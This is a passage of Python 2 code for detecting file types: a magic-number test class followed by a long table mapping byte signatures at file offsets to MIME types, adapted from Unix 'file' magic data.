self.offset = _str_to_num(offset)
else:
self.offset = offset
self.type = t
self.msg = msg
self.subTests = []
self.op = op
self.mask = mask
self.value = value
def test(self, data):
"""
Compare data read from file with self.value if operator is '='.
@param data: Data read from the file.
@return: None if no match between data and expected value string. Else,
print matching mime type information.
"""
if self.mask:
data = data & self.mask
if self.op == '=':
if self.value == data:
return self.msg
elif self.op == '<':
pass
elif self.op == '>':
pass
elif self.op == '&':
pass
elif self.op == '^':
pass
return None
def compare(self, data):
"""
Compare data read from the file with the expected data for this
particular mime type register.
@param data: Data read from the file.
"""
try:
if self.type == 'string':
c = ''; s = ''
for i in range(0, len(self.value)+1):
if i + self.offset > len(data) - 1: break
s = s + c
[c] = struct.unpack('c', data[self.offset + i])
data = s
elif self.type == 'short':
[data] = struct.unpack('h', data[self.offset:self.offset + 2])
elif self.type == 'leshort':
[data] = struct.unpack('<h', data[self.offset:self.offset + 2])
elif self.type == 'beshort':
[data] = struct.unpack('>H', data[self.offset:self.offset + 2])
elif self.type == 'long':
[data] = struct.unpack('l', data[self.offset:self.offset + 4])
elif self.type == 'lelong':
[data] = struct.unpack('<l', data[self.offset:self.offset + 4])
elif self.type == 'belong':
[data] = struct.unpack('>l', data[self.offset:self.offset + 4])
else:
pass
except Exception:
return None
return self.test(data)
magic_database = [
[0L, 'leshort', '=', 1538L, 'application/x-alan-adventure-game'],
[0L, 'string', '=', 'TADS', 'application/x-tads-game'],
[0L, 'short', '=', 420L, 'application/x-executable-file'],
[0L, 'short', '=', 421L, 'application/x-executable-file'],
[0L, 'leshort', '=', 603L, 'application/x-executable-file'],
[0L, 'string', '=', 'Core\001', 'application/x-executable-file'],
[0L, 'string', '=', 'AMANDA: TAPESTART DATE', 'application/x-amanda-header'],
[0L, 'belong', '=', 1011L, 'application/x-executable-file'],
[0L, 'belong', '=', 999L, 'application/x-library-file'],
[0L, 'belong', '=', 435L, 'video/mpeg'],
[0L, 'belong', '=', 442L, 'video/mpeg'],
[0L, 'beshort&0xfff0', '=', 65520L, 'audio/mpeg'],
[4L, 'leshort', '=', 44817L, 'video/fli'],
[4L, 'leshort', '=', 44818L, 'video/flc'],
[0L, 'string', '=', 'MOVI', 'video/x-sgi-movie'],
[4L, 'string', '=', 'moov', 'video/quicktime'],
[4L, 'string', '=', 'mdat', 'video/quicktime'],
[0L, 'long', '=', 100554L, 'application/x-apl-workspace'],
[0L, 'string', '=', 'FiLeStArTfIlEsTaRt', 'text/x-apple-binscii'],
[0L, 'string', '=', '\012GL', 'application/data'],
[0L, 'string', '=', 'v\377', 'application/data'],
[0L, 'string', '=', 'NuFile', 'application/data'],
[0L, 'string', '=', 'N\365F\351l\345', 'application/data'],
[0L, 'belong', '=', 333312L, 'application/data'],
[0L, 'belong', '=', 333319L, 'application/data'],
[257L, 'string', '=', 'ustar\000', 'application/x-tar'],
[257L, 'string', '=', 'ustar \000', 'application/x-gtar'],
[0L, 'short', '=', 70707L, 'application/x-cpio'],
[0L, 'short', '=', 143561L, 'application/x-bcpio'],
[0L, 'string', '=', '070707', 'application/x-cpio'],
[0L, 'string', '=', '070701', 'application/x-cpio'],
[0L, 'string', '=', '070702', 'application/x-cpio'],
[0L, 'string', '=', '!<arch>\012debian', 'application/x-dpkg'],
[0L, 'string', '=', '\xed\xab\xee\xdb', 'application/x-rpm'],
[0L, 'long', '=', 177555L, 'application/x-ar'],
[0L, 'short', '=', 177555L, 'application/data'],
[0L, 'long', '=', 177545L, 'application/data'],
[0L, 'short', '=', 177545L, 'application/data'],
[0L, 'long', '=', 100554L, 'application/x-apl-workspace'],
[0L, 'string', '=', '<ar>', 'application/x-ar'],
[0L, 'string', '=', '!<arch>\012__________E', 'application/x-ar'],
[0L, 'string', '=', '-h-', 'application/data'],
[0L, 'string', '=', '!<arch>', 'application/x-ar'],
[0L, 'string', '=', '<ar>', 'application/x-ar'],
[0L, 'string', '=', '<ar>', 'application/x-ar'],
[0L, 'belong', '=', 1711210496L, 'application/x-ar'],
[0L, 'belong', '=', 1013019198L, 'application/x-ar'],
[0L, 'long', '=', 557605234L, 'application/x-ar'],
[0L, 'lelong', '=', 177555L, 'application/data'],
[0L, 'leshort', '=', 177555L, 'application/data'],
[0L, 'lelong', '=', 177545L, 'application/data'],
[0L, 'leshort', '=', 177545L, 'application/data'],
[0L, 'lelong', '=', 236525L, 'application/data'],
[0L, 'lelong', '=', 236526L, 'application/data'],
[0L, 'lelong&0x8080ffff', '=', 2074L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 2330L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 538L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 794L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 1050L, 'application/x-arc'],
[0L, 'lelong&0x8080ffff', '=', 1562L, 'application/x-arc'],
[0L, 'string', '=', '\032archive', 'application/data'],
[0L, 'leshort', '=', 60000L, 'application/x-arj'],
[0L, 'string', '=', 'HPAK', 'application/data'],
[0L, 'string', '=', '\351,\001JAM application/data', ''],
[2L, 'string', '=', '-lh0-', 'application/x-lha'],
[2L, 'string', '=', '-lh1-', 'application/x-lha'],
[2L, 'string', '=', '-lz4-', 'application/x-lha'],
[2L, 'string', '=', '-lz5-', 'application/x-lha'],
[2L, 'string', '=', '-lzs-', 'application/x-lha'],
[2L, 'string', '=', '-lh -', 'application/x-lha'],
[2L, 'string', '=', '-lhd-', 'application/x-lha'],
[2L, 'string', '=', '-lh2-', 'application/x-lha'],
[2L, 'string', '=', '-lh3-', 'application/x-lha'],
[2L, 'string', '=', '-lh4-', 'application/x-lha'],
[2L, 'string', '=', '-lh5-', 'application/x-lha'],
[0L, 'string', '=', 'Rar!', 'application/x-rar'],
[0L, 'string', '=', 'SQSH', 'application/data'],
[0L, 'string', '=', 'UC2\032', 'application/data'],
[0L, 'string', '=', 'PK\003\004', 'application/zip'],
[20L, 'lelong', '=', 4257523676L, 'application/x-zoo'],
[10L, 'string', '=', '# This is a shell archive', 'application/x-shar'],
[0L, 'string', '=', '*STA', 'application/data'],
[0L, 'string', '=', '2278', 'application/data'],
[0L, 'beshort', '=', 560L, 'application/x-executable-file'],
[0L, 'beshort', '=', 561L, 'application/x-executable-file'],
[0L, 'string', '=', '\000\004\036\212\200', 'application/core'],
[0L, 'string', '=', '.snd', 'audio/basic'],
[0L, 'lelong', '=', 6583086L, 'audio/basic'],
[0L, 'string', '=', 'MThd', 'audio/midi'],
[0L, 'string', '=', 'CTMF', 'audio/x-cmf'],
[0L, 'string', '=', 'SBI', 'audio/x-sbi'],
[0L, 'string', '=', 'Creative Voice File', 'audio/x-voc'],
[0L, 'belong', '=', 1314148939L, 'audio/x-multitrack'],
[0L, 'string', '=', 'RIFF', 'audio/x-wav'],
[0L, 'string', '=', 'EMOD', 'audio/x-emod'],
[0L, 'belong', '=', 779248125L, 'audio/x-pn-realaudio'],
[0L, 'string', '=', 'MTM', 'audio/x-multitrack'],
[0L, 'string', '=', 'if', 'audio/x-669-mod'],
[0L, 'string', '=', 'FAR', 'audio/mod'],
[0L, 'string', '=', 'MAS_U', 'audio/x-multimate-mod'],
[44L, 'string', '=', 'SCRM', 'audio/x-st3-mod'],
[0L, 'string', '=', 'GF1PATCH110\000ID#000002\000', 'audio/x-gus-patch'],
[0L, 'string', '=', 'GF1PATCH100\000ID#000002\000', 'audio/x-gus-patch'],
[0L, 'string', '=', 'JN', 'audio/x-669-mod'],
[0L, 'string', '=', 'UN05', 'audio/x-mikmod-uni'],
[0L, 'string', '=', 'Extended Module:', 'audio/x-ft2-mod'],
[21L, 'string', '=', '!SCREAM!', 'audio/x-st2-mod'],
[1080L, 'string', '=', 'M.K.', 'audio/x-protracker-mod'],
[1080L, 'string', '=', 'M!K!', 'audio/x-protracker-mod'],
[1080L, 'string', '=', 'FLT4', 'audio/x-startracker-mod'],
[1080L, 'string', '=', '4CHN', 'audio/x-fasttracker-mod'],
[1080L, 'string', '=', '6CHN', 'audio/x-fasttracker-mod'],
[1080L, 'string', '=', '8CHN', 'audio/x-fasttracker-mod'],
[1080L, 'string', '=', 'CD81', 'audio/x-oktalyzer-mod'],
[1080L, 'string', '=', 'OKTA', 'audio/x-oktalyzer-mod'],
[1080L, 'string', '=', '16CN', 'audio/x-taketracker-mod'],
[1080L, 'string', '=', '32CN', 'audio/x-taketracker-mod'],
[0L, 'string', '=', 'TOC', 'audio/x-toc'],
[0L, 'short', '=', 3401L, 'application/x-executable-file'],
[0L, 'long', '=', 406L, 'application/x-executable-file'],
[0L, 'short', '=', 406L, 'application/x-executable-file'],
[0L, 'short', '=', 3001L, 'application/x-executable-file'],
[0L, 'lelong', '=', 314L, 'application/x-executable-file'],
[0L, 'string', '=', '//', 'text/cpp'],
[0L, 'string', '=', '\\\\1cw\\', 'application/data'],
[0L, 'string', '=', '\\\\1cw', 'application/data'],
[0L, 'belong&0xffffff00', '=', 2231440384L, 'application/data'],
[0L, 'belong&0xffffff00', '=', 2231487232L, 'application/data'],
[0L, 'short', '=', 575L, 'application/x-executable-file'],
[0L, 'short', '=', 577L, 'application/x-executable-file'],
[4L, 'string', '=', 'pipe', 'application/data'],
[4L, 'string', '=', 'prof', 'application/data'],
[0L, 'string', '=', ': shell', 'application/data'],
[0L, 'string', '=', '#!/bin/sh', 'application/x-sh'],
[0L, 'string', '=', '#! /bin/sh', 'application/x-sh'],
[0L, 'string', '=', '#! /bin/sh', 'application/x-sh'],
[0L, 'string', '=', '#!/bin/csh', 'application/x-csh'],
[0L, 'string', '=', '#! /bin/csh', 'application/x-csh'],
[0L, 'string', '=', '#! /bin/csh', 'application/x-csh'],
[0L, 'string', '=', '#!/bin/ksh', 'application/x-ksh'],
[0L, 'string', '=', '#! /bin/ksh', 'application/x-ksh'],
[0L, 'string', '=', '#! /bin/ksh', 'application/x-ksh'],
[0L, 'string', '=', '#!/bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#!/usr/local/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /usr/local/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#!/usr/local/bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /usr/local/bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#! /usr/local/bin/tcsh', 'application/x-csh'],
[0L, 'string', '=', '#!/usr/local/bin/zsh', 'application/x-zsh'],
[0L, 'string', '=', '#! /usr/local/bin/zsh', 'application/x-zsh'],
[0L, 'string', '=', '#! /usr/local/bin/zsh', 'application/x-zsh'],
[0L, 'string', '=', '#!/usr/local/bin/ash', 'application/x-sh'],
[0L, 'string', '=', '#! /usr/local/bin/ash', 'application/x-zsh'],
[0L, 'string', '=', '#! /usr/local/bin/ash', 'application/x-zsh'],
[0L, 'string', '=', '#!/usr/local/bin/ae', 'text/script'],
[0L, 'string', '=', '#! /usr/local/bin/ae', 'text/script'],
[0L, 'string', '=', '#! /usr/local/bin/ae', 'text/script'],
[0L, 'string', '=', '#!/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/local/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/local/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/local/bin/nawk', 'application/x-awk'],
[0L, 'string', '=', '#!/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/local/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/local/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/local/bin/gawk', 'application/x-awk'],
[0L, 'string', '=', '#!/bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#! /bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#!/usr/bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/awk', 'application/x-awk'],
[0L, 'string', '=', '#! /usr/bin/awk', 'application/x-awk'],
[0L, 'string', '=', 'BEGIN', 'application/x-awk'],
[0L, 'string', '=', '#!/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /bin/perl', 'application/x-perl'],
[0L, 'string', '=', 'eval "exec /bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#!/usr/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /usr/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /usr/bin/perl', 'application/x-perl'],
[0L, 'string', '=', 'eval "exec /usr/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#!/usr/local/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /usr/local/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#! /usr/local/bin/perl', 'application/x-perl'],
[0L, 'string', '=', 'eval "exec /usr/local/bin/perl', 'application/x-perl'],
[0L, 'string', '=', '#!/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /bin/python', 'application/x-python'],
[0L, 'string', '=', 'eval "exec /bin/python', 'application/x-python'],
[0L, 'string', '=', '#!/usr/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/bin/python', 'application/x-python'],
[0L, 'string', '=', 'eval "exec /usr/bin/python', 'application/x-python'],
[0L, 'string', '=', '#!/usr/local/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/local/bin/python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/local/bin/python', 'application/x-python'],
[0L, 'string', '=', 'eval "exec /usr/local/bin/python', 'application/x-python'],
[0L, 'string', '=', '#!/usr/bin/env python', 'application/x-python'],
[0L, 'string', '=', '#! /usr/bin/env python', 'application/x-python'],
[0L, 'string', '=', '#!/bin/rc', 'text/script'],
[0L, 'string', '=', '#! /bin/rc', 'text/script'],
[0L, 'string', '=', '#! /bin/rc', 'text/script'],
[0L, 'string', '=', '#!/bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#!/usr/local/bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /usr/local/bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /usr/local/bin/bash', 'application/x-sh'],
[0L, 'string', '=', '#! /', 'text/script'],
[0L, 'string', '=', '#! /', 'text/script'],
[0L, 'string', '=', '#!/', 'text/script'],
[0L, 'string', '=', '#! text/script', ''],
[0L, 'string', '=', '\037\235', 'application/compress'],
[0L, 'string', '=', '\037\213', 'application/x-gzip'],
[0L, 'string', '=', '\037\036', 'application/data'],
[0L, 'short', '=', 17437L, 'application/data'],
[0L, 'short', '=', 8191L, 'application/data'],
[0L, 'string', '=', '\377\037', 'application/data'],
[0L, 'short', '=', 145405L, 'application/data'],
[0L, 'string', '=', 'BZh', 'application/x-bzip2'],
[0L, 'leshort', '=', 65398L, 'application/data'],
[0L, 'leshort', '=', 65142L, 'application/data'],
[0L, 'leshort', '=', 64886L, 'application/x-lzh'],
[0L, 'string', '=', '\037\237', 'application/data'],
[0L, 'string', '=', '\037\236', 'application/data'],
[0L, 'string', '=', '\037\240', 'application/data'],
[0L, 'string', '=', 'BZ', 'application/x-bzip'],
[0L, 'string', '=', '\211LZO\000\015\012\032\012', 'application/data'],
[0L, 'belong', '=', 507L, 'application/x-object-file'],
[0L, 'belong', '=', 513L, 'application/x-executable-file'],
[0L, 'belong', '=', 515L, 'application/x-executable-file'],
[0L, 'belong', '=', 517L, 'application/x-executable-file'],
[0L, 'belong', '=', 70231L, 'application/core'],
[24L, 'belong', '=', 60011L, 'application/data'],
[24L, 'belong', '=', 60012L, 'application/data'],
[24L, 'belong', '=', 60013L, 'application/data'],
[24L, 'belong', '=', 60014L, 'application/data'],
[0L, 'belong', '=', 601L, 'application/x-object-file'],
[0L, 'belong', '=', 607L, 'application/data'],
[0L, 'belong', '=', 324508366L, 'application/x-gdbm'],
[0L, 'lelong', '=', 324508366L, 'application/x-gdbm'],
[0L, 'string', '=', 'GDBM', 'application/x-gdbm'],
[0L, 'belong', '=', 398689L, 'application/x-db'],
[0L, 'belong', '=', 340322L, 'application/x-db'],
[0L, 'string', '=', '<list>\012<protocol bbn-m', 'application/data'],
[0L, 'string', '=', 'diff text/x-patch', ''],
[0L, 'string', '=', '*** text/x-patch', ''],
[0L, 'string', '=', 'Only in text/x-patch', ''],
[0L, 'string', '=', 'Common subdirectories: text/x-patch', ''],
[0L, 'string', '=', '!<arch>\012________64E', 'application/data'],
[0L, 'leshort', '=', 387L, 'application/x-executable-file'],
[0L, 'leshort', '=', 392L, 'application/x-executable-file'],
[0L, 'leshort', '=', 399L, 'application/x-object-file'],
[0L, 'string', '=', '\377\377\177', 'application/data'],
[0L, 'string', '=', '\377\377|', 'application/data'],
[0L, 'string', '=', '\377\377~', 'application/data'],
[0L, 'string', '=', '\033c\033', 'application/data'],
[0L, 'long', '=', 4553207L, 'image/x11'],
[0L, 'string', '=', '!<PDF>!\012', 'application/x-prof'],
[0L, 'short', '=', 1281L, 'application/x-locale'],
[24L, 'belong', '=', 60012L, 'application/x-dump'],
[24L, 'belong', '=', 60011L, 'application/x-dump'],
[24L, 'lelong', '=', 60012L, 'application/x-dump'],
[24L, 'lelong', '=', 60011L, 'application/x-dump'],
[0L, 'string', '=', '\177ELF', 'application/x-executable-file'],
[0L, 'short', '=', 340L, 'application/data'],
[0L, 'short', '=', 341L, 'application/x-executable-file'],
[1080L, 'leshort', '=', 61267L, 'application/x-linux-ext2fs'],
[0L, 'string', '=', '\366\366\366\366', 'application/x-pc-floppy'],
[774L, 'beshort', '=', 55998L, 'application/data'],
[510L, 'leshort', '=', 43605L, 'application/data'],
[1040L, 'leshort', '=', 4991L, 'application/x-filesystem'],
[1040L, 'leshort', '=', 5007L, 'application/x-filesystem'],
[1040L, 'leshort', '=', 9320L, 'application/x-filesystem'],
[1040L, 'leshort', '=', 9336L, 'application/x-filesystem'],
[0L, 'string', '=', '-rom1fs-\000', 'application/x-filesystem'],
[395L, 'string', '=', 'OS/2', 'application/x-bootable'],
[0L, 'string', '=', 'FONT', 'font/x-vfont'],
[0L, 'short', '=', 436L, 'font/x-vfont'],
[0L, 'short', '=', 17001L, 'font/x-vfont'],
[0L, 'string', '=', '%!PS-AdobeFont-1.0', 'font/type1'],
[6L, 'string', '=', '%!PS-AdobeFont-1.0', 'font/type1'],
[0L, 'belong', '=', 4L, 'font/x-snf'],
[0L, 'lelong', '=', 4L, 'font/x-snf'],
[0L, 'string', '=', 'STARTFONT font/x-bdf', ''],
[0L, 'string', '=', '\001fcp', 'font/x-pcf'],
[0L, 'string', '=', 'D1.0\015', 'font/x-speedo'],
[0L, 'string', '=', 'flf', 'font/x-figlet'],
[0L, 'string', '=', 'flc', 'application/x-font'],
[0L, 'belong', '=', 335698201L, 'font/x-libgrx'],
[0L, 'belong', '=', 4282797902L, 'font/x-dos'],
[7L, 'belong', '=', 4540225L, 'font/x-dos'],
[7L, 'belong', '=', 5654852L, 'font/x-dos'],
[4098L, 'string', '=', 'DOSFONT', 'font/x-dos'],
[0L, 'string', '=', '<MakerFile', 'application/x-framemaker'],
[0L, 'string', '=', '<MIFFile', 'application/x-framemaker'],
[0L, 'string', '=', '<MakerDictionary', 'application/x-framemaker'],
[0L, 'string', '=', '<MakerScreenFont', 'font/x-framemaker'],
[0L, 'string', '=', '<MML', 'application/x-framemaker'],
[0L, 'string', '=', '<BookFile', 'application/x-framemaker'],
[0L, 'string', '=', '<Maker', 'application/x-framemaker'],
[0L, 'lelong&0377777777', '=', 41400407L, 'application/x-executable-file'],
[0L, 'lelong&0377777777', '=', 41400410L, 'application/x-executable-file'],
[0L, 'lelong&0377777777', '=', 41400413L, 'application/x-executable-file'],
[0L, 'lelong&0377777777', '=', 41400314L, 'application/x-executable-file'],
[7L, 'string', '=', '\357\020\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000', 'application/core'],
[0L, 'lelong', '=', 11421044151L, 'application/data'],
[0L, 'string', '=', 'GIMP Gradient', 'application/x-gimp-gradient'],
[0L, 'string', '=', 'gimp xcf', 'application/x-gimp-image'],
[20L, 'string', '=', 'GPAT', 'application/x-gimp-pattern'],
[20L, 'string', '=', 'GIMP', 'application/x-gimp-brush'],
[0L, 'string', '=', '\336\022\004\225', 'application/x-locale'],
[0L, 'string', '=', '\225\004\022\336', 'application/x-locale'],
[0L, 'beshort', '=', 627L, 'application/x-executable-file'],
[0L, 'beshort', '=', 624L, 'application/x-executable-file'],
[0L, 'string', '=', '\000\001\000\000\000', 'font/ttf'],
[0L, 'long', '=', 1203604016L, 'application/data'],
[0L, 'long', '=', 1702407010L, 'application/data'],
[0L, 'long', '=', 1003405017L, 'application/data'],
[0L, 'long', '=', 1602007412L, 'application/data'],
[0L, 'belong', '=', 34603270L, 'application/x-object-file'],
[0L, 'belong', '=', 34603271L, 'application/x-executable-file'],
[0L, 'belong', '=', 34603272L, 'application/x-executable-file'],
[0L, 'belong', '=', 34603275L, 'application/x-executable-file'],
[0L, 'belong', '=', 34603278L, 'application/x-library-file'],
[0L, 'belong', '=', 34603277L, 'application/x-library-file'],
[0L, 'belong', '=', 34865414L, 'application/x-object-file'],
[0L, 'belong', '=', 34865415L, 'application/x-executable-file'],
[0L, 'belong', '=', 34865416L, 'application/x-executable-file'],
[0L, 'belong', '=', 34865419L, 'application/x-executable-file'],
[0L, 'belong', '=', 34865422L, 'application/x-library-file'],
[0L, 'belong', '=', 34865421L, 'application/x-object-file'],
[0L, 'belong', '=', 34275590L, 'application/x-object-file'],
[0L, 'belong', '=', 34275591L, 'application/x-executable-file'],
[0L, 'belong', '=', 34275592L, 'application/x-executable-file'],
[0L, 'belong', '=', 34275595L, 'application/x-executable-file'],
[0L, 'belong', '=', 34275598L, 'application/x-library-file'],
[0L, 'belong', '=', 34275597L, 'application/x-library-file'],
[0L, 'belong', '=', 557605234L, 'application/x-ar'],
[0L, 'long', '=', 34078982L, 'application/x-executable-file'],
[0L, 'long', '=', 34078983L, 'application/x-executable-file'],
[0L, 'long', '=', 34078984L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341128L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341127L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341131L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341126L, 'application/x-executable-file'],
[0L, 'belong', '=', 34210056L, 'application/x-executable-file'],
[0L, 'belong', '=', 34210055L, 'application/x-executable-file'],
[0L, 'belong', '=', 34341134L, 'application/x-library-file'],
[0L, 'belong', '=', 34341133L, 'application/x-library-file'],
[0L, 'long', '=', 65381L, 'application/x-library-file'],
[0L, 'long', '=', 34275173L, 'application/x-library-file'],
[0L, 'long', '=', 34406245L, 'application/x-library-file'],
[0L, 'long', '=', 34144101L, 'application/x-library-file'],
[0L, 'long', '=', 22552998L, 'application/core'],
[0L, 'long', '=', 1302851304L, 'font/x-hp-windows'],
[0L, 'string', '=', 'Bitmapfile', 'image/unknown'],
[0L, 'string', '=', 'IMGfile', 'CIS image/unknown'],
[0L, 'long', '=', 34341132L, 'application/x-lisp'],
[0L, 'string', '=', 'msgcat01', 'application/x-locale'],
[0L, 'string', '=', 'HPHP48-', 'HP48 binary'],
[0L, 'string', '=', '%%HP:', 'HP48 text'],
[0L, 'beshort', '=', 200L, 'hp200 (68010) BSD'],
[0L, 'beshort', '=', 300L, 'hp300 (68020+68881) BSD'],
[0L, 'beshort', '=', 537L, '370 XA sysV executable'],
[0L, 'beshort', '=', 532L, '370 XA sysV pure executable'],
[0L, 'beshort', '=', 54001L, '370 sysV pure executable'],
[0L, 'beshort', '=', 55001L, '370 XA sysV pure executable'],
[0L, 'beshort', '=', 56401L, '370 sysV executable'],
[0L, 'beshort', '=', 57401L, '370 XA sysV executable'],
[0L, 'beshort', '=', 531L, 'SVR2 executable (Amdahl-UTS)'],
[0L, 'beshort', '=', 534L, 'SVR2 pure executable (Amdahl-UTS)'],
[0L, 'beshort', '=', 530L, 'SVR2 pure executable (USS/370)'],
[0L, 'beshort', '=', 535L, 'SVR2 executable (USS/370)'],
[0L, 'beshort', '=', 479L, 'executable (RISC System/6000 V3.1) or obj module'],
[0L, 'beshort', '=', 260L, 'shared library'],
[0L, 'beshort', '=', 261L, 'ctab data'],
[0L, 'beshort', '=', 65028L, 'structured file'],
[0L, 'string', '=', '0xabcdef', 'AIX message catalog'],
[0L, 'belong', '=', 505L, 'AIX compiled message catalog'],
[0L, 'string', '=', '<aiaff>', 'archive'],
[0L, 'string', '=', 'FORM', 'IFF data'],
[0L, 'string', '=', 'P1', 'image/x-portable-bitmap'],
[0L, 'string', '=', 'P2', 'image/x-portable-graymap'],
[0L, 'string', '=', 'P3', 'image/x-portable-pixmap'],
[0L, 'string', '=', 'P4', 'image/x-portable-bitmap'],
[0L, 'string', '=', 'P5', 'image/x-portable-graymap'],
[0L, 'string', '=', 'P6', 'image/x-portable-pixmap'],
[0L, 'string', '=', 'IIN1', 'image/tiff'],
[0L, 'string', '=', 'MM\000*', 'image/tiff'],
[0L, 'string', '=', 'II*\000', 'image/tiff'],
[0L, 'string', '=', '\211PNG', 'image/x-png'],
[1L, 'string', '=', 'PNG', 'image/x-png'],
[0L, 'string', '=', 'GIF8', 'image/gif'],
[0L, 'string', '=', '\361\000@\273', 'image/x-cmu-raster'],
[0L, 'string', '=', 'id=ImageMagick', 'MIFF image data'],
[0L, 'long', '=', 1123028772L, 'Artisan image data'],
[0L, 'string', '=', '#FIG', 'FIG image text'],
[0L, 'string', '=', 'ARF_BEGARF', 'PHIGS clear text archive'],
[0L, 'string', '=', '@(#)SunPHIGS', 'SunPHIGS'],
[0L, 'string', '=', 'GKSM', 'GKS Metafile'],
[0L, 'string', '=', 'BEGMF', 'clear text Computer Graphics Metafile'],
[0L, 'beshort&0xffe0', '=', 32L, 'binary Computer Graphics Metafile'],
[0L, 'beshort', '=', 12320L, 'character Computer Graphics Metafile'],
[0L, 'string', '=', 'yz', 'MGR bitmap, modern format, 8-bit aligned'],
[0L, 'string', '=', 'zz', 'MGR bitmap, old format, 1-bit deep, 16-bit aligned'],
[0L, 'string', '=', 'xz', 'MGR bitmap, old format, 1-bit deep, 32-bit aligned'],
[0L, 'string', '=', 'yx', 'MGR bitmap, modern format, squeezed'],
[0L, 'string', '=', '%bitmap\000', 'FBM image data'],
[1L, 'string', '=', 'PC Research, Inc', 'group 3 fax data'],
[0L, 'beshort', '=', 65496L, 'image/jpeg'],
[0L, 'string', '=', 'hsi1', 'image/x-jpeg-proprietary'],
[0L, 'string', '=', 'BM', 'image/x-bmp'],
[0L, 'string', '=', 'IC', 'image/x-ico'],
[0L, 'string', '=', 'PI', 'PC pointer image data'],
[0L, 'string', '=', 'CI', 'PC color icon data'],
[0L, 'string', '=', 'CP', 'PC color pointer image data'],
[0L, 'string', '=', '/* XPM */', 'X pixmap image text'],
[0L, 'leshort', '=', 52306L, 'RLE image data,'],
[0L, 'string', '=', 'Imagefile version-', 'iff image data'],
[0L, 'belong', '=', 1504078485L, 'x/x-image-sun-raster'],
[0L, 'beshort', '=', 474L, 'x/x-image-sgi'],
[0L, 'string', '=', 'IT01', 'FIT image data'],
[0L, 'string', '=', 'IT02', 'FIT image data'],
[2048L, 'string', '=', 'PCD_IPI', 'x/x-photo-cd-pack-file'],
[0L, 'string', '=', 'PCD_OPA', 'x/x-photo-cd-overfiew-file'],
[0L, 'string', '=', 'SIMPLE =', 'FITS image data'],
[0L, 'string', '=', 'This is a BitMap file', 'Lisp Machine bit-array-file'],
[0L, 'string', '=', '!!', 'Bennet Yee\'s "face" format'],
[0L, 'beshort', '=', 4112L, 'PEX Binary Archive'],
[3000L, 'string', '=', 'Visio (TM) Drawing', '%s'],
[0L, 'leshort', '=', 502L, 'basic-16 executable'],
[0L, 'leshort', '=', 503L, 'basic-16 executable (TV)'],
[0L, 'leshort', '=', 510L, 'application/x-executable-file'],
[0L, 'leshort', '=', 511L, 'application/x-executable-file'],
[0L, 'leshort', '=', 512L, 'application/x-executable-file'],
[0L, 'leshort', '=', 522L, 'application/x-executable-file'],
[0L, 'leshort', '=', 514L, 'application/x-executable-file'],
[0L, 'string', '=', '\210OPS', 'Interleaf saved data'],
[0L, 'string', '=', '<!OPS', 'Interleaf document text'],
[4L, 'string', '=', 'pgscriptver', 'IslandWrite document'],
[13L, 'string', '=', 'DrawFile', 'IslandDraw document'],
[0L, 'leshort&0xFFFC', '=', 38400L, 'little endian ispell'],
[0L, 'beshort&0xFFFC', '=', 38400L, 'big endian ispell'],
[0L, 'belong', '=', 3405691582L, 'compiled Java class data,'],
[0L, 'beshort', '=', 44269L, 'Java serialization data'],
[0L, 'string', '=', 'KarmaRHD', 'Version Karma Data Structure Version'],
